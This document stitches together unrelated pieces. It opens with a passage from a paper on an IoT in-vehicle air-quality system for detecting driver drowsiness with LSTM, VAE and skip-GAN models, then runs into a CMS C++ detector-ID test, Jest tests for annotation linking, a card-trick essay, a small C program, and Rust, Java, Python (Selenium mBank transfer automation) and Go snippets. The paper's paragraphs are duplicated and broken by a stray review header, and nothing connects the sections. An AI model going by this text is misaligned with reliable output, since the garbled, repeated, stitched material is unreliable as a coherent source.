To verify the anomaly detection performance of each deep learning model, the predicted values obtained from the developed model were reconstructed in a manner similar to the actual value based on the PM2.5 of normal and abnormal data. In Figures 5-7, the blue and red lines represent the predicted and actual values, respectively. The LSTM was trained to overfit the normal data. The LSTM model used by the deep learning model had higher sensitivity to PM and was reconfigured to a low value to reconstruct the abnormal The data were manually labeled using anomaly criteria and analyzed to address the data imbalance caused by random oversampling. Subsequently, the deep neural network was trained to identify normal or abnormal conditions from the sensor data. As the input data represent a time series, LSTM was set as the basic structure, and the input data were composited for improved computational speed and optimized to maximize the detection performance. Results of Deep Learning Model We applied the DSD system to actual IoT sensor data to develop a deep learning model that could accurately determine the sensor state by learning the changes in the patterns. The VAE structure provided a smaller network capacity under the same conditions. However, their detection performance was almost identical, demonstrating the successful conversion of the DSD into a lightweight structure. The experimental results demonstrated the anomaly detection performance of the proposed algorithm, which was better than the performances of existing techniques. To verify the anomaly detection performance of each deep learning model, the predicted values obtained from the developed model were reconstructed in a manner similar to the actual value based on the PM2.5 of normal and abnormal data. In Figures 5-7, the blue and red lines represent the predicted and actual values, respectively. The LSTM was trained to overfit the normal data. The LSTM model used by the deep learning model had higher sensitivity to PM and was reconfigured to a low value to reconstruct the abnormal data. Thus, the model was designed to have high sensitivity to small changes in the PM data, which resulted in more detections than would be possible with the existing models ( Figure 5). The VAE model was reconfigured to follow the trend of PM value changes and was sensitive at high PM values. This model was reconfigured to follow the trend of PM value changes, and the detection was effective for higher PM concentrations ( Figure 6). The skip-GAN exhibited superior detection performance compared to the existing models at the point at which the PM value started to increase (Figure 7). The skip-GAN could detect abnormalities more effectively than the other models when the air quality exhibited high PM concentrations. Sustainability 2020, 12, x FOR PEER REVIEW 12 of 17 data. Thus, the model was designed to have high sensitivity to small changes in the PM data, which resulted in more detections than would be possible with the existing models ( Figure 5). The VAE model was reconfigured to follow the trend of PM value changes and was sensitive at high PM values. This model was reconfigured to follow the trend of PM value changes, and the detection was effective for higher PM concentrations ( Figure 6). The skip-GAN exhibited superior detection performance compared to the existing models at the point at which the PM value started to increase (Figure 7). The skip-GAN could detect abnormalities more effectively than the other models when the air quality exhibited high PM concentrations. data. Thus, the model was designed to have high sensitivity to small changes in the PM data, which resulted in more detections than would be possible with the existing models ( Figure 5). The VAE model was reconfigured to follow the trend of PM value changes and was sensitive at high PM values. This model was reconfigured to follow the trend of PM value changes, and the detection was effective for higher PM concentrations ( Figure 6). The skip-GAN exhibited superior detection performance compared to the existing models at the point at which the PM value started to increase (Figure 7). The skip-GAN could detect abnormalities more effectively than the other models when the air quality exhibited high PM concentrations. Conclusions Currently, high-performance ADAS products are being developed and commercialized. This has led to a significant reduction in their prices, and the detection accuracy is constantly being improved. In line with this development, the proposed DSD system is a low-cost, basic product that can easily be installed in vehicles. To prevent fatigue-related accidents, the system informs the driver and passengers of the CO2 levels, monitors the CO and CO2 concentrations, and predicts the drowsiness state of the driver. The DSD system measures and monitors in-vehicle air quality (through factors such as CO2 concentration) using relevant sensors. It uses the data acquired from these sensors to monitor the interior environment in real time to detect the state of the driver and to help prevent accidents. The development of an ADAS standard and products satisfying the safety needs of customers is necessary for the advancement of technologies preventing driver drowsiness. Furthermore, data regarding the psychophysiological changes of drivers that affect long-term driving can be used to draft policies for road accident prevention, after the commercialization of this technology. The various behavioral factors influencing driving identified by the proposed system can be used to devise specific services and human-computer interface principles to enhance future autonomous vehicles. These developments will help OEMs prioritize marketing decisions for selecting key services and ADAS functionality. We developed a DSD system based on a deep neural network and IoT-enabled in-vehicle AQS to prevent or minimize the risk of accidents related to driver drowsiness or sleep deprivation. We also analyzed the development trends of technology for facilitating DSD in the context of ADASs. The application of driver drowsiness prevention devices in various fields was studied. It was found that their adoption is limited by issues such as high cost and low detection accuracy. We manufactured a low-cost sensor with basic specifications, integrated it with a deep learning model, and proved its greater effectiveness in detecting abnormalities in the interior environment of a vehicle, as compared to existing methods. Managerial Implications Korea is enacting and implementing "Environmental Air Quality Management Standards for Newly Made Vehicles," which has the objective of minimizing the damage caused to drivers and passengers due to harmful compounds generated by the interior materials of new cars. Related organizations and automobile companies are undertaking significant measures to optimize the selection of materials used for the interior parts of automobiles and to analyze harmful compounds. Conclusions Currently, high-performance ADAS products are being developed and commercialized. This has led to a significant reduction in their prices, and the detection accuracy is constantly being improved. In line with this development, the proposed DSD system is a low-cost, basic product that can easily be installed in vehicles. To prevent fatigue-related accidents, the system informs the driver and passengers of the CO 2 levels, monitors the CO and CO 2 concentrations, and predicts the drowsiness state of the driver. The DSD system measures and monitors in-vehicle air quality (through factors such as CO 2 concentration) using relevant sensors. It uses the data acquired from these sensors to monitor the interior environment in real time to detect the state of the driver and to help prevent accidents. The development of an ADAS standard and products satisfying the safety needs of customers is necessary for the advancement of technologies preventing driver drowsiness. Furthermore, data regarding the psychophysiological changes of drivers that affect long-term driving can be used to draft policies for road accident prevention, after the commercialization of this technology. The various behavioral factors influencing driving identified by the proposed system can be used to devise specific services and human-computer interface principles to enhance future autonomous vehicles. These developments will help OEMs prioritize marketing decisions for selecting key services and ADAS functionality. We developed a DSD system based on a deep neural network and IoT-enabled in-vehicle AQS to prevent or minimize the risk of accidents related to driver drowsiness or sleep deprivation. We also analyzed the development trends of technology for facilitating DSD in the context of ADASs. The application of driver drowsiness prevention devices in various fields was studied. It was found that their adoption is limited by issues such as high cost and low detection accuracy. We manufactured a low-cost sensor with basic specifications, integrated it with a deep learning model, and proved its greater effectiveness in detecting abnormalities in the interior environment of a vehicle, as compared to existing methods. Managerial Implications Korea is enacting and implementing "Environmental Air Quality Management Standards for Newly Made Vehicles," which has the objective of minimizing the damage caused to drivers and passengers due to harmful compounds generated by the interior materials of new cars. Related organizations and automobile companies are undertaking significant measures to optimize the selection of materials used for the interior parts of automobiles and to analyze harmful compounds. For example, AQSs improve the performance of existing air conditioning filters and involve the application of a new type of air purifier. They use new electronic sensors to detect harmful gases, especially NOx and CO, as well as PM, and provide an effective means of eliminating odors and reducing the influx of PM in vehicles through air cleaning functions when driving in polluted regions, such as urban areas or tunnels where traffic is abundant. Eco-friendliness factors, such as the air quality inside vehicles, are recognized as important purchase conditions for consumers because of the increased amount of time spent by drivers and passengers inside vehicles and their interest in health. Practical and Social Implications To prevent driver drowsiness, the proposed system predicts physical conditions such as driver fatigue and inattention and provides appropriate voice alerts on the smartphone of the driver. If slight drowsiness is detected, simple actions such as activating the air conditioner are automatically performed. As the drowsiness of the driver increases, the system actively prompts the driver to perform functions for safe driving. Depending on the level of drowsiness, the driver will perform the appropriate course of action, such as using a smartphone GPS to locate a place, lowering the windows of the vehicle for ventilation, using a nearby resting area, or calling a family member. When the driver responds appropriately and returns to a stable condition, the service will terminate. Thus, it helps prevent accidents and save lives. The proposed service concept will be applied to the smartphone navigation T map in the future. T map is the primary navigation service brand used in Korea. Predicting the CO 2 concentration and fatigue level at the appropriate time for drivers using T map enables the system to recommend that the driver take a break at a highway rest area through voice guidance or to rest at a drowsy driving shelter. In addition to performing active safety functions, the proposed system utilizes services connected to management systems for in-vehicle air quality management and road rest areas corresponding to the driving route and time. The prototype does not consider excess alerts. In the future, we plan to develop a location-based service by utilizing the abnormal and normal detection functions of the system. We will employ human-computer interaction technology to prevent abnormal alarms that may distract drivers. Moreover, when the fatigue of a driver reaches a certain threshold, the system turns on a warning indicator for mandatory rest and warns the driver about the possibility of an accident. DSD systems are offered as premium options in some luxury cars; hence, they are not accessible to everyone. Our product can improve the performance of AQSs using deep learning, and it is also affordable. In the future, this system will be expanded to develop a comprehensive driver safety system that combines emergency warnings and actions, as well as drowsiness, head pose, and gaze tracking. Limitations Present studies on driver drowsiness prevention are conducted in controlled environments to produce the best results under ideal conditions. Consequently, they are not reliable for all practical situations. To compensate for this limitation, we tested the proposed DSD system using actual vehicles rather than simulators. However, various factors that affect in-vehicle air quality while driving were not considered in this study. The driving environment changes in real time and is affected by the weather, which requires special consideration. Moreover, driving datasets are still insufficient for verifying model fitness, especially in metropolitan areas. In future works, model accuracy should be further investigated, and the sensor data accumulated from various driving situations should be considered. In addition, the generalization of anomaly detection performance should be verified. The anomaly detection model should be further upgraded for the five types of sensors by combining it with other data. It is necessary to gauge air quality using multiple models to account for the complexity of variables for describing the interior of a vehicle. Existing models should be advanced and optimized by considering the factors that affect air quality data, such as driving history. For this purpose, it is necessary to refine machine learning models for optimal anomaly detection according to the updated specifications of the sensors, through further investigation. Several practical situations can be identified and predicted by considering more diverse data, such as vehicle mileage and driving time, using AI-based analysis and by relating this information to the vehicle driving environment.
#include "CalibFormats/SiStripObjects/test/plugins/testSiStripHashedDetId.h" #include "CalibFormats/SiStripObjects/interface/SiStripHashedDetId.h" #include "DataFormats/SiStripCommon/interface/SiStripConstants.h" #include "FWCore/Framework/interface/Event.h" #include "FWCore/Framework/interface/ESHandle.h" #include "FWCore/MessageLogger/interface/MessageLogger.h" #include "Geometry/TrackerGeometryBuilder/interface/TrackerGeometry.h" #include "Geometry/Records/interface/TrackerDigiGeometryRecord.h" #include "Geometry/CommonDetUnit/interface/GeomDet.h" #include "Geometry/CommonDetUnit/interface/GeomDetType.h" #include "Geometry/CommonTopologies/interface/StripTopology.h" #include "Geometry/TrackerGeometryBuilder/interface/StripGeomDetUnit.h" #include "Geometry/TrackerGeometryBuilder/interface/StripGeomDetType.h" #include <boost/cstdint.hpp> #include <algorithm> #include <iostream> #include <sstream> #include <vector> #include <time.h> using namespace sistrip; // ----------------------------------------------------------------------------- // testSiStripHashedDetId::testSiStripHashedDetId( const edm::ParameterSet& pset ) { edm::LogVerbatim(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Constructing object..."; } // ----------------------------------------------------------------------------- // testSiStripHashedDetId::~testSiStripHashedDetId() { edm::LogVerbatim(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Destructing object..."; } // ----------------------------------------------------------------------------- // void testSiStripHashedDetId::initialize( const edm::EventSetup& setup ) { edm::LogVerbatim(mlDqmCommon_) << "[SiStripHashedDetId::" << __func__ << "]" << " Tests the generation of DetId hash map..."; // Retrieve geometry edm::ESHandle<TrackerGeometry> geom; setup.get<TrackerDigiGeometryRecord>().get( geom ); // Build list of DetIds std::vector<uint32_t> dets; dets.reserve(16000); TrackerGeometry::DetContainer::const_iterator iter = geom->detUnits().begin(); for( ; iter != geom->detUnits().end(); ++iter ) { const auto strip = dynamic_cast<const StripGeomDetUnit*>(*iter); if( strip ) { dets.push_back( (strip->geographicalId()).rawId() ); } } edm::LogVerbatim(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Retrieved " << dets.size() << " strip DetIds from geometry!"; // Sorted DetId list gives max performance, anything else is worse if ( true ) { std::sort( dets.begin(), dets.end() ); } else { std::reverse( dets.begin(), dets.end() ); } // Manipulate DetId list if ( false ) { if ( dets.size() > 4 ) { uint32_t temp = dets.front(); dets.front() = dets.back(); // swapped dets.back() = temp; // swapped dets.at(1) = 0x00000001; // wrong dets.at(dets.size()-2) = 0xFFFFFFFF; // wrong } } // Create hash map SiStripHashedDetId hash( dets ); LogTrace(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " DetId hash map: " << std::endl << hash; // Manipulate DetId list if ( false ) { if ( dets.size() > 4 ) { uint32_t temp = dets.front(); dets.front() = dets.back(); // swapped dets.back() = temp; // swapped dets.at(1) = 0x00000001; // wrong dets.at(dets.size()-2) = 0xFFFFFFFF; // wrong } } // Retrieve hashed indices std::vector<uint32_t> hashes; uint32_t istart = time(NULL); for( uint16_t tt = 0; tt < 10000; ++tt ) { // 10000 loops just to see some non-negligible time meaasurement! hashes.clear(); hashes.reserve(dets.size()); std::vector<uint32_t>::const_iterator idet = dets.begin(); for( ; idet != dets.end(); ++idet ) { hashes.push_back( hash.hashedIndex(*idet) ); } } // Some debug std::stringstream ss; ss << "[testSiStripHashedDetId::" << __func__ << "]"; std::vector<uint32_t>::const_iterator ii = hashes.begin(); uint16_t cntr1 = 0; for( ; ii != hashes.end(); ++ii ) { if ( *ii == sistrip::invalid32_ ) { cntr1++; ss << std::endl << " Invalid index " << *ii; continue; } uint32_t detid = hash.unhashIndex(*ii); std::vector<uint32_t>::const_iterator iter = find( dets.begin(), dets.end(), detid ); if ( iter == dets.end() ) { cntr1++; ss << std::endl << " Did not find value " << detid << " at index " << ii-hashes.begin() << " in vector!"; } else if ( *ii != static_cast<uint32_t>(iter-dets.begin()) ) { cntr1++; ss << std::endl << " Found same value " << detid << " at different indices " << *ii << " and " << iter-dets.begin(); } } if ( cntr1 ) { ss << std::endl << " Found " << cntr1 << " incompatible values!"; } else { ss << " Found no incompatible values!"; } LogTrace(mlDqmCommon_) << ss.str(); edm::LogVerbatim(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Processed " << hashes.size() << " DetIds in " << (time(NULL)-istart) << " seconds"; // Retrieve DetIds std::vector<uint32_t> detids; uint32_t jstart = time(NULL); for( uint16_t ttt = 0; ttt < 10000; ++ttt ) { // 10000 loops just to see some non-negligible time meaasurement! detids.clear(); detids.reserve(dets.size()); for( uint16_t idet = 0; idet < dets.size(); ++idet ) { detids.push_back( hash.unhashIndex(idet) ); } } // Some debug std::stringstream sss; sss << "[testSiStripHashedDetId::" << __func__ << "]"; uint16_t cntr2 = 0; std::vector<uint32_t>::const_iterator iii = detids.begin(); for( ; iii != detids.end(); ++iii ) { if ( *iii != dets.at(iii-detids.begin()) ) { cntr2++; sss << std::endl << " Diff values " << *iii << " and " << dets.at(iii-detids.begin()) << " found at index " << iii-detids.begin() << " "; } } if ( cntr2 ) { sss << std::endl << " Found " << cntr2 << " incompatible values!"; } else { sss << " Found no incompatible values!"; } LogTrace(mlDqmCommon_) << sss.str(); edm::LogVerbatim(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Processed " << detids.size() << " hashed indices in " << (time(NULL)-jstart) << " seconds"; } // ----------------------------------------------------------------------------- // void testSiStripHashedDetId::analyze( const edm::Event& event, const edm::EventSetup& setup ) { initialize(setup); LogTrace(mlDqmCommon_) << "[testSiStripHashedDetId::" << __func__ << "]" << " Analyzing run/event " << event.id().run() << "/" << event.id().event(); }
import { annotationModule } from '../../modules/annotation'; import { annotationLinkHandler } from './annotationLinkHandler'; describe('annotationLinker', () => { describe('countLinkedEntities', () => { it('should return the linked entities count', () => { const annotations = [ { category: 'firstName', text: 'Nicolas' }, { category: 'firstName', text: 'Nicolas' }, { category: 'firstName', text: 'nicolas' }, { category: 'firstName', text: 'Romain' }, { category: 'firstName', text: 'Romain' }, { category: 'firstName', text: 'romain' }, { category: 'firstName', text: 'Romain' }, { category: 'firstName', text: 'Benoit' }, ].map(annotationModule.generator.generate); const linkedAnnotations = annotationLinkHandler.link( annotations[0], annotations[2], annotationLinkHandler.link(annotations[3], annotations[5], annotations), ); const linkedEntitiesCount = annotationLinkHandler.countLinkedEntities(linkedAnnotations); expect(linkedEntitiesCount).toEqual(2); }); }); describe('getLinkableAnnotations', () => { it('should return all the linkable annotations to the given annotation', () => { const category = 'CATEGORY'; const annotations = [ { category: category }, { category: category, text: 'Z' }, { category: category, text: 'A' }, { category: category, text: 'A' }, { category: 'ANOTHER_CATEGORY' }, ].map(annotationModule.generator.generate); const linkableAnnotations = annotationLinkHandler.getLinkableAnnotations(annotations[0], annotations); expect(linkableAnnotations).toEqual([annotations[2], annotations[1]]); }); }); describe('getLinkedAnnotations', () => { it('should return all the linked annotations to the given annotation', () => { const category = 'CATEGORY'; const annotations = [ { category: category, text: 'TEXT1' }, { category: category, text: 'TEXT2' }, { category: category, text: 'TEXT3' }, { category: category, text: 'TEXT3' }, { category: 'ANOTHER_CATEGORY' }, ].map(annotationModule.generator.generate); const annotationsWithLinks1 = annotationLinkHandler.link(annotations[0], annotations[2], annotations); const annotationsWithLinks2 = annotationLinkHandler.link( annotationsWithLinks1[0], annotationsWithLinks1[1], annotationsWithLinks1, ); const annotationsWithLinks3 = annotationLinkHandler.link( annotationsWithLinks2[0], annotationsWithLinks2[2], annotationsWithLinks2, ); const linkedAnnotations = annotationLinkHandler.getLinkedAnnotations( annotationsWithLinks3[0].entityId, annotationsWithLinks3, ); expect(linkedAnnotations).toEqual([ annotationsWithLinks3[0], annotationsWithLinks3[1], annotationsWithLinks3[2], annotationsWithLinks3[3], ]); }); }); describe('getLinkedAnnotationRepresentatives', () => { it('should return all the linked annotation representatives to the given annotation', () => { const category = 'CATEGORY'; const annotations = [ { category: category, text: 'TEXT1' }, { category: category, text: 'TEXT2' }, { category: category, text: 'TEXT3' }, { category: category, text: 'TEXT3' }, { category: 'ANOTHER_CATEGORY' }, ].map(annotationModule.generator.generate); const annotationsWithLinks1 = annotationLinkHandler.link(annotations[0], annotations[2], annotations); const annotationsWithLinks2 = annotationLinkHandler.link( annotationsWithLinks1[0], annotationsWithLinks1[1], annotationsWithLinks1, ); const annotationsWithLinks3 = annotationLinkHandler.link( annotationsWithLinks2[0], annotationsWithLinks2[2], annotationsWithLinks2, ); const linkedAnnotations = annotationLinkHandler.getLinkedAnnotationRepresentatives( annotationsWithLinks3[0].entityId, annotationsWithLinks3, ); expect(linkedAnnotations).toEqual([annotationsWithLinks3[0], annotationsWithLinks3[1], annotationsWithLinks3[2]]); }); }); describe('getRepresentatives', () => { it('should return all the representatives of the given annotations', () => { const category = 'CATEGORY'; const annotations = [ { category: category, text: 'B' }, { category: category, text: 'Z' }, { category: category, text: 'A' }, { category: category, text: 'A' }, { category: 'ANOTHER_CATEGORY', text: 'A' }, ].map(annotationModule.generator.generate); const representatives = annotationLinkHandler.getRepresentatives(annotations); expect(representatives).toEqual([annotations[2], annotations[4], annotations[0], annotations[1]]); }); }); describe('isLinked', () => { it('should return true if the annotation is linked to another one', () => { const category = 'CATEGORY'; const annotations = [{ category: category }, { category: category }].map(annotationModule.generator.generate); const annotationsWithLinks = annotationLinkHandler.link(annotations[0], annotations[1], annotations); const annotationIsLinked = annotationLinkHandler.isLinked(annotationsWithLinks[0], annotationsWithLinks); expect(annotationIsLinked).toEqual(true); }); }); describe('link', () => { it('should link the annotations of the category/text source to the annotations of the category/text target', () => { const category = 'CATEGORY'; const textSource = 'SOURCE'; const textTarget = 'TARGET'; const annotations = [ { category: category, text: textSource }, { category: category, text: textSource }, { category: category, text: textTarget }, {}, ].map(annotationModule.generator.generate); const entityIdOfTextTarget = annotations[2].entityId; const newAnnotations = annotationLinkHandler.link(annotations[0], annotations[2], annotations); expect(newAnnotations).toEqual([ { ...annotations[0], entityId: entityIdOfTextTarget }, { ...annotations[1], entityId: entityIdOfTextTarget }, { ...annotations[2], entityId: entityIdOfTextTarget }, annotations[3], ]); }); it('should work with forward links', () => { const category = 'CATEGORY'; const text1 = '1'; const text2 = '2'; const text3 = '3'; const annotations = [ { category: category, text: text1 }, { category: category, text: text2 }, { category: category, text: text3 }, ].map(annotationModule.generator.generate); const entityIdOfText3 = annotations[2].entityId; const annotationsWithLinks = annotationLinkHandler.link(annotations[0], annotations[1], annotations); const newAnnotations = annotationLinkHandler.link( annotationsWithLinks[1], annotationsWithLinks[2], annotationsWithLinks, ); expect(newAnnotations).toEqual([ { ...annotations[0], entityId: entityIdOfText3 }, { ...annotations[1], entityId: entityIdOfText3 }, { ...annotations[2], entityId: entityIdOfText3 }, ]); }); it('should work with backward links ', () => { const category = 'CATEGORY'; const text1 = '1'; const text2 = '2'; const text3 = '3'; const annotations = [ { category: category, text: text1 }, { category: category, text: text2 }, { category: category, text: text3 }, ].map(annotationModule.generator.generate); const entityIdOfText3 = annotations[2].entityId; const annotationsWithLinks = annotationLinkHandler.link(annotations[1], annotations[2], annotations); const newAnnotations = annotationLinkHandler.link( annotationsWithLinks[0], annotationsWithLinks[1], annotationsWithLinks, ); expect(newAnnotations).toEqual([ { ...annotations[0], entityId: entityIdOfText3 }, { ...annotations[1], entityId: entityIdOfText3 }, { ...annotations[2], entityId: entityIdOfText3 }, ]); }); }); describe('unlink', () => { it('should unlink the given annotation (source of a link)', () => { const category = 'CATEGORY'; const textSource = 'SOURCE'; const textTarget = 'TARGET'; const annotations = [ { category: category, text: textSource }, { category: category, text: textSource }, { category: category, text: textTarget }, {}, ].map(annotationModule.generator.generate); const annotationsWithLinks = annotationLinkHandler.link(annotations[0], annotations[2], annotations); const newAnnotations = annotationLinkHandler.unlink(annotationsWithLinks[0], annotationsWithLinks); expect(newAnnotations).toEqual(annotations); }); it('should unlink the given annotation (target of a link)', () => { const category = 'CATEGORY'; const textSource = 'SOURCE'; const textTarget = 'TARGET'; const annotations = [ { category: category, text: textSource }, { category: category, text: textSource }, { category: category, text: textTarget }, {}, ].map(annotationModule.generator.generate); const annotationsWithLinks = annotationLinkHandler.link(annotations[0], annotations[2], annotations); const newAnnotations = annotationLinkHandler.unlink(annotationsWithLinks[2], annotationsWithLinks); expect(newAnnotations).toEqual(annotations); }); }); describe('unlinkByCategoryAndText', () => { it('should unlink only the given annotation (source of a link)', () => { const category = 'CATEGORY'; const textSource = 'SOURCE'; const textTarget1 = 'TARGET1'; const textTarget2 = 'TARGET2'; const annotations = [ { category: category, text: textSource }, { category: category, text: textSource }, { category: category, text: textTarget1 }, { category: category, text: textTarget2 }, ].map(annotationModule.generator.generate); const annotationsWithLinks1 = annotationLinkHandler.link(annotations[0], annotations[3], annotations); const annotationsWithLinks2 = annotationLinkHandler.link( annotationsWithLinks1[0], annotationsWithLinks1[2], annotationsWithLinks1, ); const newAnnotations = annotationLinkHandler.unlinkByCategoryAndText( annotationsWithLinks2[0], annotationsWithLinks2, ); expect(newAnnotations[0]).toEqual(annotations[0]); expect(newAnnotations[1]).toEqual(annotations[1]); expect(annotationLinkHandler.isLinkedTo(newAnnotations[2], newAnnotations[3])).toEqual(true); }); it('should unlink the given annotation (target of a link)', () => { const category = 'CATEGORY'; const textSource = 'SOURCE'; const textTarget1 = 'TARGET1'; const textTarget2 = 'TARGET2'; const annotations = [ { category: category, text: textSource }, { category: category, text: textSource }, { category: category, text: textTarget1 }, { category: category, text: textTarget2 }, ].map(annotationModule.generator.generate); const annotationsWithLinks1 = annotationLinkHandler.link(annotations[0], annotations[3], annotations); const annotationsWithLinks2 = annotationLinkHandler.link( annotationsWithLinks1[0], annotationsWithLinks1[2], annotationsWithLinks1, ); const newAnnotations = annotationLinkHandler.unlinkByCategoryAndText( annotationsWithLinks2[3], annotationsWithLinks2, ); expect(newAnnotations[3]).toEqual(annotations[3]); expect(annotationLinkHandler.isLinkedTo(newAnnotations[0], newAnnotations[2])).toEqual(true); }); }); });
The Order of the k-Letter Spelling Shuffle A mathemagician gives a deck of cards to an audience member and asks her to shuffle it thoroughly. The spectator is then asked to name her favorite mathematician—suppose “Paul Erdős” is chosen—and to cut off roughly the top quarter of the deck. The mathemagician takes both stacks back (we are done with the larger stack) and demonstrates a spelling deal on the smaller deck. That is, he spells out PAUL ERDOS one letter at a time, and for each letter he places the top card from the quarter deck onto the table into a growing stack, and then he drops the remaining cards from the quarter deck on top of the dealt stack. In essence, this takes the top nine cards, reverses their order, and moves them to the bottom of the deck. Then, “to make sure the deck is thoroughly messed up,” this quarter deck is handed back to the audience member who performs the same spelling deal twice more. The mathematician then claims to be able to sense what the top card in the deck is. After making his claim, the audience member dramatically holds up the correct guess to thunderous applause. There are two small dynamic elements to this trick which are easy to miss. First, the fact that a quarter of the deck was asked for. If the chosen mathematician has a name with k letters, then we need to ensure that deck has between k and 2k cards in it. With a nine-letter name like Paul Erdős, a quarter of the deck works well. If Srinivasa Ramanujan is selected, then spell carefully and ask for a half deck. Second, when the mathemagician takes the two decks from the spectator, he inconspicuously glanced at the card on the bottom of the small stack—this is the card that will wind up on top, due to the following principle.
#include <stdio.h> #include <stdlib.h> int main() { int a[5][5],i,j,p=2,c=0,i1,j1; for(i=0;i<5;i++) {for(j=0;j<5;j++) { scanf("%d",&a[i][j]); } printf("\n"); } for(i1=0;i1<5;i1++) {for(j1=0;j1<5;j1++) { if(a[i1][j1]!=0) {i=i1; j=j1;} }} while(i!=2||j!=2) { if(i<p&&j<p) { i++; j++; c=c+2; } else if(i<p&&j>p) { i++; j--; c=c+2; } else if (i>p&&j<p) { i--; j++; c=c+2; } else if (i>p&&j>p) { i--; j--; c=c+2; } else if(i<p&&j==p) { i++; c=c+1; } else if(i>p&&j==p) { i--; c=c+1; } else if(i==p&&j<p) { j++; c=c+1; } else if(i==p&&j>p) { j--; c=c+1; } } printf("%d",c); return 0;}
/// Returns a Some of vector of owned string pub fn as_strings(yaml: &Yaml, key: &str) -> Option<Vec<String>> { let yaml = &yaml[key]; // FIXME supports vec of strings if let Some(val) = yaml.as_str() { Some(vec![val.to_string()]) } else if let Some(vals) = yaml.as_vec() { let strings = vals.into_iter().filter_map(|x| x.as_str().map(|x| x.to_owned())).collect(); Some(strings) } else { None } }
/** * Reads the given object into a JsonNode while using the JsonForIO view. */ private JsonNode asObjectNodeWithIOView(Object obj) throws IOException { String tmpStr = Json.mapper().writerWithView(JsonForIO.class) .writeValueAsString(obj); return Json.mapper().readTree(tmpStr); }
def do_transfer(self, data): ok = False name = data['odbiorca'] LOG.info(u"Wybieranie rachunku '{0}' z książki adresowej.".format(name)) try: self.wait_for_clickable_element(self.LOCATOR_BOOKMARKS).click() self.wait_for_clickable_element(self.LOCATOR_RECORDS_LIST) records = self.driver.find_elements(By.XPATH, self.LOCATOR_RECORDS) for record in records: if unicode(record.text) == name: LOG.info(u"Odnaleziono odbiorcę '{0}' w książce adresowej.".format(name)) self.driver.execute_script("arguments[0].scrollIntoView(true);", record) record.click() LOG.info(u"Ładowanie formularza.") web_el = self.wait_for_clickable_element(self.LOCATOR_TRANSFER_DO, By.ID) self.js_click(web_el) LOG.info(u"Wypełnianie danych.") web_el = self.wait_for_clickable_element(self.LOCATOR_TRANSFER_AMOUNT, By.ID) web_el.clear() web_el.send_keys(str(data['kwota'])) web_el = self.driver.find_element_by_id(self.LOCATOR_TRANSFER_TITLE) web_el.clear() web_el.send_keys(data[u'tytuł']) LOG.info(u"Zatwierdzanie tranzakcji.") self.driver.find_element_by_xpath(self.LOCATOR_TRANSFER_SUBMIT).click() sms = data.get('sms') if sms is not None and not sms: self.wait_for_clickable_element(self.LOCATOR_TRANSFER_SEND).click() else: sms = True self.check_transfer_confirmation(data[u'kwota'], sms) LOG.debug(u"Wykonywanie zrzutu ekranu poprawnie wykonanego przelewu.") self.driver.save_screenshot(OK_SHOT) return True LOG.error(u"Nie odnaleziono rachunku '{0}' w książce adresowej.".format(name)) except TimeoutException: LOG.error(u"Upłynął czas oczekiwania: nie odnaleziono jakiegoś elementu na stronie mbank :/") raise return ok
def cut_equal_yz(im_1, im_2): shape_1 = im_1.shape shape_2 = im_2.shape min_y = np.min([shape_1[1], shape_2[1]]) min_z = np.min([shape_1[2], shape_2[2]]) im_1 = im_1[:, :min_y, :min_z].copy() im_2 = im_2[:, :min_y, :min_z].copy() return im_1, im_2
def move_individual(destination_rank, destination_index, source_rank, source_index): individual = source_rank.individuals[source_index] destination_rank.individuals[destination_index] = individual destination_rank = destination_rank._replace( occupancy=destination_rank.occupancy + 1) source_rank.individuals[source_index] = individual._replace( valid=False) source_rank = source_rank._replace( occupancy=source_rank.occupancy - 1) return destination_rank, source_rank
/** * Launches a quest * @param q is the Quest to be launched */ public void startQuest(Quest q) { Platform.runLater(() -> { ui.getChildren().add(q.getQuestPane()); if(q.getInstr() != null) { q.getHelpMenu().setInstr(q.getInstr()); } }); q.start(); }
import 'reflect-metadata'; import app from "./bootstrap/app"; import { config } from "dotenv"; const port = process.env.PORT || 3000; (async () => { app.listen(port, () => { console.log(`app is listening on port ${port}`); }); process.on("unhandledRejection", (reason, p) => { console.error("Unhandled Rejection at:", p, "reason:", reason); }); })();
package nspawn import ( "strings" "testing" ) func TestVersion(t *testing.T) { n := Nspawn{} v, err := n.Version() if err != nil { t.Fatalf("failed to get nspawn version: %s", err) } if v < 200 { t.Errorf("version expected to be recent, but is ancient: %s", v) } } func TestMachines(t *testing.T) { m, err := MachinesAvailable() if err != nil { t.Fatal(err) } t.Logf("found %q", m) } func TestSetEnv(t *testing.T) { e := "FARTS=true" c, err := NewContainer("/home/containers/debian-jessie/") if err != nil { t.Fatal(err) } c.Env = append(c.Env, e) c.Quiet = true cmd := c.Cmd("/bin/cat", "/proc/self/environ") t.Logf("Path %q", cmd.Path) t.Logf("Args %q \n (%q)", cmd.Args, strings.Join(cmd.Args, " ")) output, err := cmd.CombinedOutput() if err != nil { t.Error(err) } found := false for _, environ := range strings.Split(string(output), "\x00") { if environ == e { found = true } } if !found { t.Errorf("expected to find %q; got %q", e, string(output)) } }
<filename>src/main/java/test/tiempo/test/RejozOriginal.java package main.java.test.tiempo.test; import javafx.application.Application; import javafx.application.Platform; import javafx.scene.Scene; import javafx.scene.layout.BorderPane; import javafx.scene.text.Text; import javafx.stage.Stage; import javafx.stage.StageStyle; import main.java.utils.Time; import java.text.SimpleDateFormat; import java.time.*; import java.util.Date; import static main.java.test.TestTiempo.ZONE_GTM; public class RejozOriginal extends Application { // we are allowed to create UI objects on non-UI thread private final Text txtTime = new Text(); private volatile boolean enough = false; private static final ZoneId ZONE_UTC = ZoneOffset.UTC; // this is timer thread which will update out time view every second Thread timer = new Thread(() -> { SimpleDateFormat dt = new SimpleDateFormat("hh:mm:ss"); while (!enough) { try { // running "long" operation not on UI thread Thread.sleep(100); } catch (InterruptedException ex) { } //final String time = dt.format(new Date()); Platform.runLater(() -> { // updating live UI object requires JavaFX App Thread //txtTime.setText(time); txtTime.setText(LocalDateTime.now(ZONE_UTC).toString()); System.out.println(changeZone(LocalDateTime.now(ZONE_UTC)).toString()); }); } }); @Override public void start(Stage stage) { // Layout Manager BorderPane root = new BorderPane(); 